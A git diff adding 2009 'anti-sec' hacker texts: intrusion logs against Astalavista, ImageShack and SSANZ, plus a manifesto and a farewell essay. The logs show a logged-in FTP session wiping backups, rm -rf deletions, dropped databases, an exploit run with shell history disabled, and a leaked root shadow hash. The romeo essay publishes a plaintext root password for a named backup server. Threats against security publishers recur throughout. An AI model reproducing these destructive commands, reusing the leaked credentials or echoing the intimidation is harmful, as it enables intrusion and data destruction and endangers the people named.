+				Came up with a crazy and very workable and professional idea. We create an invitation only forum with the BEST security experts worldwide 
+ONLY. Security Experts from Bugtraq lists, exploit writters, reverse engineers etc..
+
+				One example a friend of mine from coresecurity.com!
+
+				We could have big projects etc.. and we can work all together to bring to the security community exploits, open source software etc..
+
+|
++------------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
+1 row in set (0.00 sec)
+
+// What an awesome yet original idea Ishtus and him... bring MORE security "experts", thats exactly what the world needs...
+
+mysql> select iss_summary,iss_description from eventum_issue where iss_id = 16;
++------------------+---------------------------------------------------------------------------------------------+
+| iss_summary      | iss_description                                                                             |
++------------------+---------------------------------------------------------------------------------------------+
+| Website guidance | Virtual Girl which guides you trought the website.
+
+			We need a girl with who you can ( talk )!!!
+			Also for the News!
+			So my suggestion is a girl who read you the news loud if you like!
+			you can choose between read yourselfe or she read it for you or both!
+
+			Go to www.heise.de! There is an example for Voice News! It's a good thing!!!
+
+			Have a look on the example girls!!
+
+			http://www.yaoti.com/de/free_yaoti.html
+
+			or that
+
+			http://www.yellostrom.de/
+
+|
++------------------+---------------------------------------------------------------------------------------------+
+1 row in set (0.00 sec)
+
+// ha ha.
+
+mysql> select iss_summary,iss_description from eventum_issue where iss_id = 7;
++--------------------------+-----------------------------------------------------------------------------------------------------------+
+| iss_summary              | iss_description                                                                                           |
++--------------------------+-----------------------------------------------------------------------------------------------------------+
+| Exploit Development Team | We need an exploit development team to focus on exploit research and publication under Astalavista name.  |
++--------------------------+-----------------------------------------------------------------------------------------------------------+
+1 row in set (0.00 sec)
+
+// LOL.
+
+mysql> exit
+Bye
+
+
+sh-3.2# ftp 212.254.194.163
+Connected to 212.254.194.163.
+220 BackupCOM_VW FTP server ready.
+504 AUTH: security mechanism 'GSSAPI' not supported.
+504 AUTH: security mechanism 'KERBEROS_V4' not supported.
+KERBEROS_V4 rejected as an authentication type
+Name (212.254.194.163:root): astalavista.com
+331 Password required for astalavista.com.
+Password:
+230 User astalavista.com logged in.
+Remote system type is UNIX.
+Using binary mode to transfer files.
+ftp> ls -la
+227 Entering Passive Mode (212,254,194,163,2,188)
+150 Opening BINARY mode data connection for 'file list'.
+dr-x------   1 root users         4096 Jun  4 06:13 astalavista.com
+226 Transfer complete.
+ftp> cd astalavista.com
+250 CWD command successful.
+ftp> ls -la
+227 Entering Passive Mode (212,254,194,163,2,189)
+150 Opening BINARY mode data connection for 'file list'.
+-rw-rw-rw-   1 astalavista.com users     23410936878 Apr 29 22:10 09-04-28-astacom_full.tar
+-rw-rw-rw-   1 astalavista.com users     20617651590 Apr 29 14:18 09-04-28-astacom_full.tar.bz2
+-rw-rw-rw-   1 astalavista.com users        88287111 Apr 29 15:57 09-04-29-astacom_sql_full.sql.tar.bz2
+-rw-rw-rw-   1 astalavista.com users     26413034040 May  2 00:21 09-05-01-astacom-Public_HTML.tar
+-rw-rw-rw-   1 astalavista.com users       277843549 May  1 17:29 09-05-01-astacom-SQL_Dump.tar
+[snip]
+226 Transfer complete.
+ftp> mdelete *
+ftp> ls -la
+227 Entering Passive Mode (212,254,194,163,2,193)
+150 Opening BINARY mode data connection for 'file list'.
+226 Transfer complete.
+ftp>
+
+sh-3.2# cd /home
+sh-3.2# ls -la
+total 120
+drwxr-xr-x 14 root    root     4096 Mar 11 17:56 .
+drwxr-xr-x 25 root    root     4096 Jun  3 02:43 ..
+drwx--x--x  9 admin   admin    4096 Nov 28  2007 admin
+-rw-------  1 root    root     8192 Jun  4 03:03 aquota.group
+-rw-------  1 root    root     8192 Jun  3 02:45 aquota.user
+drwx--x--x  6 astanet astanet  4096 Jun  4 09:51 astanet
+drwxr-xr-x  2 root    root     4096 Jul 29  2008 backup
+drwxr-xr-x  2 root    root     4096 Sep 17  2008 backup.14161
+drwx--x--x 10 com     com      4096 Apr 28 12:40 com
+drwxr-xr-x  2 root    root     4096 May 17  2007 ftp
+drwx------  3 jon     jon      4096 Sep 21  2007 jon
+drwx------  2 root    root    16384 Sep 11  2007 lost+found
+drwxr-xr-x  2 root    root     4096 Sep 14  2007 my
+drwxr-xr-x  5 mysql   mysql    4096 Sep 24  2007 mysqldata
+drwx------  2 jon     jon      4096 Sep 15  2007 test
+drwxrwxrwt  2 root    root     4096 Jul 29  2008 tmp
+
+sh-3.2# rm -rf backup/
+sh-3.2# rm -rf backup.14161/
+sh-3.2# rm -rf ftp/
+sh-3.2# rm -rf jon/
+sh-3.2# rm -rf my/
+sh-3.2# rm -rf mysqldata/
+sh-3.2# rm -rf test/
+sh-3.2# rm -rf tmp/
+sh-3.2# cd ~
+sh-3.2# rm -rf *
+sh-3.2# rm -rf /var/log/
+rm: cannot remove directory `/var/log//proftpd': Directory not empty
+sh-3.2# rm -rf /home/*
+sh-3.2# mysql
+Welcome to the MySQL monitor.  Commands end with ; or \g.
+Your MySQL connection id is 407156
+Server version: 5.0.45-community-log MySQL Community Edition (GPL)
+
+Type 'help;' or '\h' for help. Type '\c' to clear the buffer.
+
+mysql> show databases;
++-----------------------+
+| Database              |
++-----------------------+
+| information_schema    |
+| astanet_ads           |
+| astanet_mailing_lists |
+| astanet_mediawiki     |
+| astanet_membersystem  |
+| com_contrexx          |
+| com_contrexx2         |
+| com_contrexx2_live    |
+| da_roundcube          |
+| dolphin               |
+| ideapool              |
+| mysql                 |
+| test                  |
+| yourmaster            |
++-----------------------+
+14 rows in set (0.03 sec)
+
+mysql> drop database astanet_membersystem;
+droQuery OK, 46 rows affected (0.81 sec)
+
+mysql> drop database com_contrexx;
+Query OK, 211 rows affected (2.72 sec)
+
+mysql> drop database com_contrexx2;
+Query OK, 237 rows affected (2.23 sec)
+
+mysql> drop database com_contrexx2_live;
+Query OK, 227 rows affected (7.63 sec)
+
+mysql> drop database ideapool;
+Query OK, 69 rows affected (0.19 sec)
+
+mysql> drop database yourmaster;
+Query OK, 158 rows affected (0.55 sec)
+
+mysql> drop database astanet_ads;
+Query OK, 9 rows affected (0.11 sec)
+
+mysql> drop database astanet_mailing_lists;
+Query OK, 24 rows affected (1.47 sec)
+
+mysql> drop database astanet_mediawiki;
+Query OK, 31 rows affected (0.51 sec)
+
+mysql> show databases;
++--------------------+
+| Database           |
++--------------------+
+| information_schema |
+| da_roundcube       |
+| dolphin            |
+| mysql              |
+| test               |
++--------------------+
+5 rows in set (0.00 sec)
+
+
+
+
+
+
+What a journey! We're not sure exactly why the "Terminator" had any influence on
+their naming (conventions) but we're sure Arnold himself wouldn't be in the
+wrong to say this pack of morons *wont be back*.
\ No newline at end of file
diff --git a/anti-sec/imageshack-pwned.txt b/anti-sec/imageshack-pwned.txt
new file mode 100644
index 0000000..ac81323
--- /dev/null
+++ b/anti-sec/imageshack-pwned.txt
@@ -0,0 +1,95 @@
+
+
+	               __  .__                                
+	_____    _____/  |_|__|           ______ ____   ____  
+	\__  \  /    \   __\  |  ______  /  ___// __ \_/ ___\ 
+	 / __ \|   |  \  | |  | /_____/  \___ \\  ___/\  \___ 
+	(____  /___|  /__| |__|         /____  >\___  >\___  >
+	     \/     \/                       \/     \/     \/ 
+
+	Proudly presents...
+	
+		 _                                     _                _    
+		(_)                                   | |              | |   
+		 _ _ __ ___   __ _  __ _  ___    ___  | |__   __ _  ___| | __
+		| | '_ ` _ \ / _` |/ _` |/ _ \' / __| | '_ \ / _` |/ __| |/ /
+		| | | | | | | (_| | (_| |  __/  \__ \ | | | (_| | (__|   < 
+		|_|_| |_| |_|\__,_|\__, |\___|  |___/ |_| |_|\__,_|\___|_|\_\
+		                    __/ |                                
+		                   |___/                                 
+
+				   
+	Anti-sec. We're a movement dedicated to the eradication of
+	full-disclosure. We wanted to give everyone an image of what we're all
+	about.
+	
+	Full-disclosure is the disclosure of exploits publicly - anywhere. The
+	security industry uses full-disclosure to profit and develop
+	scare-tactics to convince people into buying their firewalls,
+	anti-virus software, and auditing services.
+	
+	Meanwhile, script kiddies copy and paste these exploits and compile
+	them, ready to strike any and all vulnerable servers they can get a hold
+	of. If whitehats were truly about security this stuff would not be
+	published, not even exploits with silly edits to make them slightly
+	unusable.
+	
+	As an added bonus, if publication wasn't enough, these exploits are
+	mirrored and distributed widely across the Internet with a nice little
+	advertisement embedded in them for the crew or website which first
+	exposed the vulnerability to the public.
+	
+	It's about money. While the world is difficult to change, and money will
+	certainly continue to be a very important in the eyes of many, our
+	battle is that of the removal of full-disclosure for the purpose of
+	making it harder for the security industry to exploit its consequences.
+	
+	It is our goal that, through mayhem and the destruction of all
+	exploitive and detrimental communities, companies, and individuals,
+	full-disclosure will be abandoned and the security industry will be
+	forced to reform.
+	
+	How do we plan to achieve this? Through the full and unrelenting,
+	unmerciful elimination of all supporters of full-disclosure 
+	and the security industry in its present form. If you own a security
+	blog, an exploit publication website or you distribute any exploits... 
+	
+	"you are a target and you will be rm'd. Only a matter of time."
+	
+	This isn't like before. This time everyone and everything is getting
+	owned.
+	
+	
+	
+	Signed: The Anti-sec Movement
+
+		"No images were harmed in the making of this... image."
+
+anti-sec:~/pwn# perl img-scan.pl
+
+Found img1.imageshack.us - lighttpd/1.4.18 - SSH-1.99-OpenSSH_4.5
+[snip]
+Found img998.imageshack.us - lighttpd/1.4.18 - SSH-1.99-OpenSSH_4.5
+
+anti-sec:~/pwn# perl mass-pwn.pl
+
+Connecting...
+
+Linux worf.imageshack.us 2.6.15-1.2054_FC5 #1 SMP Tue Mar 14 15:48:20 EST 2006 x86_64 x86_64 x86_64 GNU/Linux
+
+Replacing images...
+
+
+img1 --> img998
+
+All images replaced: http://img998.imageshack.us/antisec.jpg
+
+
+
+
+If you think that we oppose your website, our advise is to pack it up and shut it down, because we're coming for you.
+
+	- anti-sec.
+
+
+
diff --git a/anti-sec/romeo-last-stand.txt b/anti-sec/romeo-last-stand.txt
new file mode 100644
index 0000000..7bb280c
--- /dev/null
+++ b/anti-sec/romeo-last-stand.txt
@@ -0,0 +1,291 @@
+
+	                 __   .__
+	_____     ____ _/  |_ |__|  ______  ____   ____
+	\__  \   /    \\   __\|  | /  ___/_/ __ \_/ ___\
+	 / __ \_|   |  \|  |  |  | \___ \ \  ___/\  \___
+	(____  /|___|  /|__|  |__|/____  > \___  >\___  >
+	     \/      \/ # exit	       \/      \/     \/*no more*
+
+
+
+-----[ Intro:
+
+No, romeo.copyandpaste.info did not get hacked, I am just doing what should be done about this mess...
+
+A few companies were getting hacked by anti-sec just now, but I decided you don't deserve to know who gets owned,
+I will keep the access to myself and you will _never_ know you got hacked.
+
+Let me try and make a few things clear.
+
+-----[ The Beginning:
+
+93K Jun  4 astalavista.txt
+
+	This is where it all started, 'anti-sec' the 'group' name was born there, people made up the rest of stories and believed them.
+
+159K Jun 10 nowayout.txt
+
+	He is a moron, 'nuff said.
+
+27K Jul  3 ssanz-pwned.txt
+
+	Swear by your own security, this is where it gets you.
+
+3.4K Jul 10 imageshack-pwned.txt
+
+	Sent the message to everyone, everyone understood it differently.
+
+
+
+--[ Astalavista - The hacking and security community.
+
+	They didn't have hackers, security or a community, I did the Internet a favor by taking them down.
+
+--[ Glafkos / nowayout - The CEH / Security Expert / [Insert-IT-Cert-Here].
+
+	He couldn't stop an attack on his own server, got rm'd and shutdown while he is actually logged on the server...
+	How pathetic.
+
+--[ SSANZ - Server Systems Administration NZ, Security, Hardening and Backup solutions.
+
+	They couldn't secure their servers and had no backups... 'nuff said?
+
+--[ ImageShack.
+
+	Even though it clearly said:
+	"No images were harmed in the making of this... image."
+	Most of you idiots reacted with:
+	"omg what does imageshack have to do with security, those guys are brutal and against their own beliefs".
+
+
+-----[ You are a moron:
+
+
+So a 'group' by the name of 'anti-sec' who are *against full-disclosure* publishes a hack-log with a few exploits used in it...
+
+The whole idea is that you, the script kiddie (along with the rest of the Internet) NEVER knew how anti-sec actually got in, get it now?
+
+	felosi decides it is actually an OpenSSH 0day,
+	WebHosting Talk forums makes a huge hype about it,
+	SANS believes it,
+	HostGator DISABLES OpenSSH on all servers and claims they have a fix for it,
+	TheRegister writes about it...
+
+...and the rest of the Internet and the 'security industry', just like sheep, follows everyone else and
+claims surface of 'patches' for the 0day, some said they will release it on DefCon, others started there
+own fake exploit (Some people actually fell for that)...
+
+You people are a pack of morons, honestly.
+
+I let you talk about it, laughed as some of you started writing patches, then I had my share of lulz when
+hosts decided to shut down OpenSSH because of a rumor that was started by felosi because a client of his
+(nowayout / Glafkos the security expert, remember him?); thought it was an OpenSSH 0day. lol.
+
+This is just another proof of how stupid the people you go to for 'security' online, how easy it is to create
+havoc online amongst you, I didn't even have to start the rumor, your own people did and you believed it.
+
+
+-----[ anti-security:
+
+
+Now off to another, more important point; anti-security...
+
+*This is my idea of anti-security, you are free to have your own, but the ideas I saw online are stupid, really*
+
+Some of you thought anti-security is against -security-, while it is really against the security -industry-,
+I don't want you to be insecure to hack you, where is the challenge in that?
+
+Others thought anti-security is about 0 disclosure of any kind, it is truly against full disclosure, where
+an actual exploit code is posted instead of an advisory to the public...
+
+I understand that disclosure is a must-have, I am not against it, I am against the people who post and help in
+spreading exploit code, Can you please tell me what good (if any) comes out of posting exploit code?
+
+I am pretty sure it does more harm than good, way more. Some suggested anti-sec should give people an alternative
+of what should be done, well here it is, sirs..
+
+Instead of posting an exploit code for the vulnerability you found, post an advisory, explain the vulnerability you found
+to the people, gain fame and credit from it, attach a PoC if necessary... but do NOT post an exploit!
+
+Now of course that will not stop 'hackers' from hacking, but it will decrease the number of random attacks, a lot,
+and everyone will benefit from it, you will gain your fame and credit for it, you can post that on your sorry ass CV.
+
+
+-----[ Comments and Response:
+
+
+#bhf <+Aelphaeis> antisec hacked BHF ?
+#bhf <+Aelphaeis> won't the antisec guys do it again ?
+#bhf <+Aelphaeis> antisec, makes no fucking sense
+#bhf <+Aelphaeis> BHF is clearly pro antisec
+
+	You are as stupid as you sound.
+
+#bhf <%Glyph> 1. romeo.copyandpaste.info is a rr account.
+#bhf <%Glyph> 2. romeo.copyandpaste.info's ns entries point to afraid.org
+
+	ORLY?
+
+#bhf  < HTH> I wonder who anti-sec is lulz
+#bhf  < HTH> Ive long since decided its not dark
+#bhf  < HTH> or r0meo
+#bhf  < HTH> so now im puzzled
+
+	I lol'd.
+
+#bhf < fr0natz> HTH, I see that point.
+#bhf < fr0natz> Romeo, lul'd a bit there.
+
+	So did he.
+
+>>T Biehn < tbiehn@gmail.com>
+>>1) Register 'Anti-Sec *' with Free Mail Provider
+>>2) Claims to Full Disclosure
+>>3) ????
+>>4) PROFIT.
+
+	True that.
+
+>>ifwm
+>>So, Anti-sec is Microsoft?
+
+	No.
+
+>>DrGirlfriend
+>>what a group of assholes (anti-sec, not imagshack). Seriously, in what way was imageshack involved in their beef with the security profession?
+
+	What a moron.
+
+>>siggplus
+>>So hackers are against full disclosure? What a shocker.
+
+	I know right?
+
+>>oobey
+>>Woah, guys! I just discovered the most amazing thing - if you don't talk about bad things,
+>>it's like they DON'T EXIST AT ALL!! As far as I'm concerned, I'm no longer living in a world with an economic crisis,
+>>global warming, OR wars in the Middle East!
+>>
+>>Thanks, anti-sec!
+
+	As DarkPontifex would say, Cool story bro.
+	It is more like, if you do not practice, publish or mirror exploits, script kiddies wont exist at all and the world will be a better place!
+
+	No problem, btw.
+
+>>SyrioForel
+>>They're not trying to protect anybody from exploits, they're trying to protect their own exploits from being advertised. Get it?
+
+	Oh okay, thanks for clearing that up for me...
+	You are wrong, it is truly about not publishing exploits, you will not get our exploits because no one knows how we get in, when we got in, etc.
+
+>>freshtimes
+>>I don't think they're attacking you as much as using imageshack's prevalence across the internet
+>>as a way to embed images as a vehicle for their message.
+
+	Finally someone gets it.
+
+>>Clumpy
+>>A self-righteous stupid hacker group at that. Full disclosure is the only thing that causes companies to patch.
+>>History shows us, over and over again, that companies won't spend the money to patch security holes without full disclosure forcing them to it.
+
+	If you are so concerned about the patch, why don't you release a patch yourself instead of releasing an exploit code to 'force them to patch'.
+
+>>alchemeron
+>>A short-sighted approach. Part of the reason for a culture of published exploits is that,
+>>if you don't publish or threaten to publish, companies will do absolutely nothing.
+
+	If everyone works by that, a lot more 'security' companies will be exposed, hacked and rm'd, because if you don't publish that they
+	cannot secure their own work, make backups or actually provide the service they offer, they will never fix it, right?
+
+	What about posting a nice advisory, saying you found vulnerability X in product Y, maybe a PoC. if company doesn't fix, you did your job,
+	no need to publish an exploit code and make thousands of websites / companies suffer while script kiddies ./xploit.
+
+
+>>anti-antisec@hushmail.com
+>>LMH, can you and your "Security Justice" friends please get laid
+>>and leave the rest of us alone? This Anti-Sec rebranding is more
+>>boredom.
+>>
+>>Oh- we know where you work, and who some of you really are. I
+>>wonder how they'd feel about this stupidity?
+
+	You don't know anything about any of us and you will never.
+	Your servers were rooted back in 2007 and we never lost access until 2009 (maybe not), how do you feel about this stupidity?
+
+>>Ant-Sec Movement < anti.sec.movement@gmail.com>
+>>Dear Reader,
+>>
+>>In light of recent events, we have decided to clarify exactly what the Anti-Sec Movement is, and who we really are.
+>>Firstly, Anti-Sec is NOT an individual clan or group; as the name implies, we are a movement
+>>< snipped>
+
+	You have nothing to do with the movement, you saw a wave of people and posts talking about anti-sec and wanted to get some
+	attention on your sorry ass.
+
+	Your targets are still up, all you ever did was a pathetic DDoS attack. You fail.
+
+>>http://www.theregister.co.uk/2009/07/13/imageshack_hack/
+>>Ironically, exploit code associated with Anti-Sec's latest attack was posted on a full disclosure mailing list.
+
+	Nothing was ever posted, k?
+
+
+...and many, many other stupid comments.
+
+
+-----[ Outro:
+
+
+Well I guess this is it, publicly owning people goes nowhere, people are too stupid, some love to make up their own stories
+and others will do anything to ride a publicity wave... rarely ever anyone actually gets the point.
+
+
+Before I leave you, I cannot stress enough that you are not as secure as you think you are,
+Full-Disclosure brings more evil than good, it is the root of most DDoS attacks, random web defacement, spam, havoc, etc.
+
+Publish an advisory if you must, do -not- publish an exploit, do -not- mirror exploits.
+
+str0ke should realize by now that most of the botnets out there, the spam, the Turkish web defacement... is his fault.
+
+If you think otherwise, do post about it, be sure that I will be reading it, but I doubt you can find more good coming out
+of full-disclosure than evil.
+
+And of course we must not forget, it is not just about Full-Disclosure, but also the people who claim they can protect you,
+claim they are a security company, swear by their own security, etc. Actually cannot provide you with that service, they
+cannot protect you, they cannot protect themselves, they don't know the basics of security, they read a tutorial on installing
+CSF/LFD, mod_security, iptable OpenSSH and call it -secure-.
+
+
+Take felosi for example, he runs secureservtech:
+
+>>Extensive security to protect your sites and data from hackers.
+>>Including mod_security, suhosin, cgi suexec,, php suexec, brute force protection on all protocols and more..
+
+72.20.1.206 - backup.secureservtech.com - The main backup server for SST, it has access to every other server SST owns.
+
+root:T6yHjuIkol0
+
+*OpenSSH is whitelisted for specific IP's only, he included mod_security, suhosin patch, grsecurity, csf/lfd... How classic.
+
+
+	Did he protect his customers from hackers like he says? is *secure*servtech really *secure*? does felosi know he got owned?
+	No.
+
+
+- Did you get scared of getting caught?
+-- no, I just didn't like how this turned out to be, taking a different approach from now on.
+
+- Are you going to stop shutting down people who publish exploits, exposing people who swear by their own security, etc?
+-- no, but this time you will never know who got owned, no logs will be published, I will keep my access for greater benefit.
+
+If you want the old page for any reason, you can download mirror here: http://romeo.copyandpaste.info/mirror.tgz
+
+
+
+	So Long, and Thanks for All the Fish.
+	- romeo.
+
+
+
+
diff --git a/anti-sec/ssanz-pwned.txt b/anti-sec/ssanz-pwned.txt
new file mode 100644
index 0000000..51cfe1e
--- /dev/null
+++ b/anti-sec/ssanz-pwned.txt
@@ -0,0 +1,679 @@
+	               __  .__                                
+	_____    _____/  |_|__|           ______ ____   ____  
+	\__  \  /    \   __\  |  ______  /  ___// __ \_/ ___\ 
+	 / __ \|   |  \  | |  | /_____/  \___ \\  ___/\  \___ 
+	(____  /___|  /__| |__|         /____  >\___  >\___  >
+	     \/     \/                       \/     \/     \/
+						
+					Some of you have seen a lot of casualties lately in the webhosting scene:
+					hosting companies being wiped and rm'd at the expense of their clients. While
+					some of this is collateral damage, we're about to show you, ladies and
+					gentlemen, that sometimes you aren't pwned because of who you host but what you
+					say.
+						
+						Practice what you preach.
+
+- Why SSANZ?
+
+Owned by a kid who claims he can manage, secure and audit servers,
+he offers a service that he clearly cannot provide, we are against that.
+
+
+LoganNZ :
+
+>>Logan of New Zealand. CEO of Server Systems Administration NZ.
+>>
+>> Signature:	
+>>Server Systems Administration NZ | SSANZ
+>>Got Hacked? | 24/7/365 Remote Emergency Support | Specialist Server Management
+>>Affordable Hosting :: Resellers, Shared & Dedicated Server Systems
+	
+Server Management $25 - Security & Hardening - $50 :
+ 
+
+>>Server Management - $25 Per Month
+>>
+>>- Full Management - Support, & 3rd Party Installs
+>>- Monitoring - Included - up to 3 ports.
+>>- Emergency Recovery
+
+
+>>Server Security - $50
+>>
+>>- Initial Scan & Report
+>>- Security Hardening & Security Installs/tweaks.
+>>- IDS, Security Monitoring & mod_sec configured.
+>>- Finishing Security Scan & SSANZ Custom Scans.
+>>
+>>
+>>Emergency Server Recovery - $150
+>>
+>>- Recover Hacked Server Systems
+>>- Recover deleted data
+>>- ANTI-dDOS Services
+>>- dDOS Investigation
+
+Security Worries? Security Audits - 50% OFF  :
+
+>>Get your site/server audited to ensure your business data is
+>>secure before you become a statistic.
+>>
+>>In the past 6 months, e-crime activity reports have increased by
+>>45% due to the global economic recession.
+>>
+>>What is involved in a Full Security Audit?
+>>
+>>External Security
+>>
+>>    * Scan for Shells/malicious scripts
+>>    * Scan for vulnerable web content ( permissions, RFI's )
+>>    * Scans for Vulnerable Server Services
+>>    * Vulnerable Ports
+>>    * Testing of TCP handling - dDOS test.
+>>    * Scan for Vulnerable PHP scripts/mods.
+>>    * Control Panel Security Audit ( external )
+>>    * Multiple Unique SSANZ Custom Scans*
+>>
+>>
+>>Internal Security
+>>
+>>    * Permissions/Ownership(s) Review
+>>    * Apache/Webserver Security
+>>    * User Account Security & binaries access audit
+>>    * Local RFI Exploits located/patched.
+>>    * System Binary Security Audit
+>>    * Firewall/IPTABLES Audit
+>>    * Bruteforce detection test & audit
+>>    * Root Access Authentication Audit
+>>    * Local PHP Functions Audit
+>>    * Control Panel Security Audit ( Internal )
+>>    * Kernel Security Audit
+>>    * Additional SSANZ Custom Scans/Audit*
+
+We at anti-sec decided to give you a _FREE_ Full Security Audit!*
+
+* `rm -rf /` is included.
+
+
+anti-sec:~/pwn# ./map ssanz.net
+	
+	IP: 66.197.143.133 ( osiris.ssanz.net )
+	WWW: Apache/2.2.11
+	SSH: SSH-2.0-OpenSSH_4.3
+	
+	IP: 66.197.204.101 ( devil.ssanz.net )
+	WWW: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8e-fips-rhel5 mod_mono/2.4 mod_auth_passthrough/2.1 mod_bwlimited/1.4
+	SSH: SSH-2.0-OpenSSH_4.3
+
+anti-sec:~/pwn# cd xpl/
+
+anti-sec:~/pwn/xpl# ./0pen0wn -h 66.197.143.133 -p 22
+
+		[+] 0wn0wn - anti-sec group
+		[+] Target: 66.197.143.133
+		[+] SSH Port: 22
+		
+		[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~>]
+
+sh-3.2# export HISTFILE=/dev/null
+
+sh-3.2# id
+uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
+
+sh-3.2# uname -a
+Linux osiris.ssanz.net 2.6.24.5-grsec-hostnoc-4.0.0-x86_64-libata #1 SMP Mon Aug 25 15:56:12 EDT 2008 x86_64 x86_64 x86_64 GNU/Linux
+
+sh-3.2# head -n1 /etc/shadow
+root:$1$t4e0hufX$UH4Q5jTj93EEAODNrSaWO/:14412:0:99999:7:::
+
+sh-3.2# w
+ 03:43:43 up 7 days, 54 min,  1 user,  load average: 9.01, 9.78, 10.73
+USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
+root     pts/0    125.238.144.224  20:17    7:26m 13:18  13:18  htop
+
+sh-3.2# pwd
+/root
+
+sh-3.2# ls -la
+total 3008
+drwxr-x--- 24 root     root        4096 Jul  4 03:43 .
+drwxr-xr-x 27 root     root        4096 Jun 27 02:49 ..
+-rw-------  1 root     root         957 Jun 13 07:24 .accesshash
+-rw-------  1 root     root        1012 Jun  1 10:39 anaconda-ks.cfg
+-rw-------  1 root     root       15460 Jul  3 23:38 .bash_history
+-rw-r--r--  1 root     root          24 Jan  6  2007 .bash_logout
+-rw-r--r--  1 root     root         191 Jan  6  2007 .bash_profile
+-rw-r--r--  1 root     root         176 Jan  6  2007 .bashrc
+drwxrwxrwx  3 therockm therockm    4096 Jun  5 07:26 bwm-ng-0.6
+-rw-r--r--  1 root     root      141564 Mar  1  2007 bwm-ng-0.6.tar.gz
+drwxr-xr-x  3 root     root        4096 Nov 15  2006 cmm
+-rw-r--r--  1 root     root       18656 Feb 28 11:32 cmm.tgz
+drwxr-xr-x  3 root     root        4096 Nov  5  2006 cmq
+-rw-r--r--  1 root     root       14507 Oct 10  2008 cmq.tgz
+drwxr-xr-x  4 root     root        4096 Jun  1 14:33 .cpanel
+drwxr-xr-x  4 root     root        4096 Jun  1 17:10 cpanel3-skel
+drwx------  3 root     root        4096 Jun  1 13:50 .cpobjcache
+drwxr-xr-x 10 root     root        4096 Apr 13 16:17 csf
+-rw-r--r--  1 root     root      430121 May 15 12:07 csf.tgz
+-rw-r--r--  1 root     root         100 Jan  6  2007 .cshrc
+drwx------  2 root     root        4096 Jun  1 13:54 .elinks
+-rw-r--r--  1 root     root     1176672 Jul  4 03:40 error_log
+-rw-r--r--  1 root     root          16 Jun  3 08:34 .forward
+drwx------  3 root     root        4096 Jun  1 10:39 .gconf
+drwx------  2 root     root        4096 Jun  1 10:39 .gconfd
+drwxr-xr-x  4 root     root        4096 Jun 10 23:42 .gem
+drwx------  2 root     root        4096 Jun  1 13:55 .gnupg
+drwxrwxrwx  5 theweath theweath    4096 Jun  1 17:13 htop-0.8.1
+-rw-r--r--  1 root     root      414870 Sep 23  2008 htop-0.8.1.tar.gz
+-rw-r--r--  1 root     root         561 Jun 27 02:48 .htoprc
+-rw-r--r--  1 root     root        8144 Jun  6 19:23 index.html
+-rw-r--r--  1 root     root        4246 Jun  1 10:39 install.log.syslog
+drwxr-xr-x  6      500 root        4096 Sep 13  2005 iptraf-3.0.0
+-rw-r--r--  1 root     root           0 Jun 27 09:21 iptraf-3.0.0.tar.gz
+-rw-r--r--  1 root     root           0 Jun 27 09:22 iptraf-3.0.0.tar.gz.1
+-rw-r--r--  1 root     root           0 Jun 27 09:24 iptraf-3.0.0.tar.gz.2
+-rw-r--r--  1 root     root      575169 Jun 27 09:26 iptraf-3.0.0.tar.gz.3
+drwx------  6 root     root        4096 Jun  1 14:21 .MirrorSearch
+-rw-------  1 root     root          61 Jun 12 21:04 .my.cnf
+-rw-------  1 root     root         139 Jul  3 10:51 .mysql_history
+-rwxrwxrwx  1 root     root       38688 Dec  1  2008 mysqltuner.pl
+-rw-r--r--  1 root     root         264 Jul  2 21:43 .pearrc
+drwxr-xr-x  2 root     root        4096 Jun  1 17:04 public_ftp
+drwxr-xr-x  3 root     root        4096 Jun  1 17:04 public_html
+-rw-------  1 root     root        1024 Jun  7 19:50 .rnd
+drwx------  3 root     root        4096 Jun  1 14:29 .spamassassin
+drwx------  2 root     root        4096 Jun  2 06:41 .ssh
+-rw-r--r--  1 root     root         129 Jan  6  2007 .tcshrc
+drwxr-xr-x  3 root     root        4096 Jun  7 21:54 tmp
+-rw-------  1 root     root           0 Jun  7 22:01 .trustwavereqs
+drw-------  2 root     root        4096 Jun  3 08:18 whmrbackups
+drw-------  3 root     root        4096 Jun 10 08:25 whmrcorebackups
+
+
+
+sh-3.2# cat .bash_history
+htop
+htop
+p
+htop
+tail -f /var/log/secure
+tail -f /var/log/secure
+[snip]
+nano highperformance.conf
+service httpd restart
+nano highperformance.conf
+service httpd restart
+nano highperformance.conf
+nano httpd.conf
+nano php.conf
+ls
+nano modsec2.conf
+ls
+[snip]
+nano visit4cash.net.conf
+cd ..
+[snip]
+netstat -anp |grep 'tcp\|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
+ps -aux|grep -i HTTP|wc -l
+w
+bwm-ng
+[snip]
+netstat -plan|grep :80|awk {.print $5.}|cut -d: -f 1|sort|uniq -c|sort -n
+netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
+netstat -plan|grep :80| awk {.print $5.} |cut -d: -f 1|sort|uniq -c|sort -n
+netstat -ntu | awk .{print $5}. | cut -d: -f1 | sort | uniq -c | sort -n
+netstat -an | awk '{print $4}' | awk -F":" '{print $2}' | sort -n -u
+netstat -nat | awk '{print $6}' | sort | uniq -c | sort -n
+netstat -nat |grep 202.54.1.10 | awk '{print $6}' | sort | uniq -c | sort -n
+netstat -atun | awk '{print $5}' | cut -d: -f1 | sed -e '/^$/d' |sort | uniq -c | sort -n
+[snip]
+/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags ALL ACK,RST,SYN,FIN -j DROP
+/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,FIN SYN,FIN -j DROP
+/sbin/iptables -A INPUT -i eth0 -p tcp --tcp-flags SYN,RST SYN,RST -j DROP
+[snip]
+service cups stop
+chkconfig cups off
+service nfslock stop
+chkconfig nfslock off
+service rpcidmapd stop
+chkconfig rpcidmapd off
+service bluetooth stop
+chkconfig bluetooth off
+service anacron stop
+chkconfig anacron off
+service avahi-daemon stop
+chkconfig avahi-daemon off
+service hidd stop
+chkconfig hidd off
+service pcscd stop
+chkconfig pcscd off
+[snip]
+http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
+screen wget http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-prefinal-iso
+htop
